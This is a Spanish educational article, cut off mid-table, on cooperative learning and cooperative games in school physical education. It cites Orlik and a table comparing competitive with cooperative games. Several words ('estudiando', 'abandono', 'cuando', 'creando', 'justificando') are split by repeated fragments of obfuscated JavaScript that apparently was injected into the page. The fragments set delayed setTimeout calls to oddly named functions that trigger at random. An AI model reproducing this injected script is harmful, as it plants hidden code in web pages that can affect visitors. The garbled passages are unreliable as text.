APRENDER DE FORMA COOPERATIVA EN EDUCACIÓN FÍSICA

Autores: Ana María Rangel Berrocal y Antonio Chaves Flores

INTRODUCCIÓN

 

Como profesionales de Educación Física buscamos promover en nuestras clases procesos de enseñanza-aprendizaje eficaces y orientados a fomentar en el alumnado su capacidad para aprender a aprender autónomamente. Para ello destacamos la utilidad del aprendizaje cooperativo como una metodología educativa en donde los alumnos trabajan juntos para mejorar su propio aprendizaje y además el aprendizaje de los demás miembros de su grupo. Numerosas investigaciones demuestran que el intercambio de información entre alumnos con diferentes conocimientos no solo mejora las habilidades sociales, sino que promueve el verdadero aprendizaje significativo, aumenta la motivación y facilita su integración dentro de su grupo-clase.

 

APRENDER DE FORMA COOPERATIVA

Podemos definir aprendizaje cooperativo como la metodología educativa que se basa en el trabajo en grupos, generalmente pequeños y heterogéneos, en los cuales cada alumno trabaja con sus compañeros para mejorar su propio aprendizaje y el de los demás. Como diferencia con el aprendizaje en grupo, en el cooperativo cada uno es responsable también de sus compañeros y no solo de sí mismo.

EL JUEGO COOPERATIVO

A mediados de los años 70, Terry Orlik estudiandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la motivación hacia la práctica deportiva en niños y niñas en edad escolar, descubrió cómo la competición exagerada llevaba a muchos niños y adolescentes hacia el abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andono de la misma. Como alternativa en aquella época y cada vez de forma más dominante dentro de la Educación Física, se propone un tipo de actividad lúdica basada en jugar CON los otros en lugar de CONTRA los otros: los juegos cooperativos.

A modo de resumen, podemos comprobar las ventajas del juego cooperativo sobre el competitivo en el siguiente cuadro del brasileño Fábio Otuzi Brotto (1999):

 

JUEGOS COMPETITIVOS 

JUEGOS COOPERATIVOS 

Son divertidos solo para algunos. 

Son divertidos para todos. 

La mayoría experimentan un sentimiento de derrota. 

Todos tienen sentimiento de victoria. 

Algunos son excluidos por falta de habilidad. 

Hay una mezcla de grupos que juegan juntos creandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando un alto nivel de aceptación mutua. 

Se aprende a se desconfiado, egoísta o, en algunos casos, la persona se siente amedrentada por los otros. 

Se aprende a compartir y a confiar en los demás. 

Los jugadores no se solidarizan y son felices cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando algo “malo” les sucede a los otros. 

Los jugadores aprenden a tener un sentido de unidad y a compartir éxito. 

Conllevan una división por categorías, creandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando barreras entre las personas y justificandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las diferencias interpersonales como una forma de exclusión. 

Hay una mezcla de personas en grupos heterogéneos que juegan juntos cre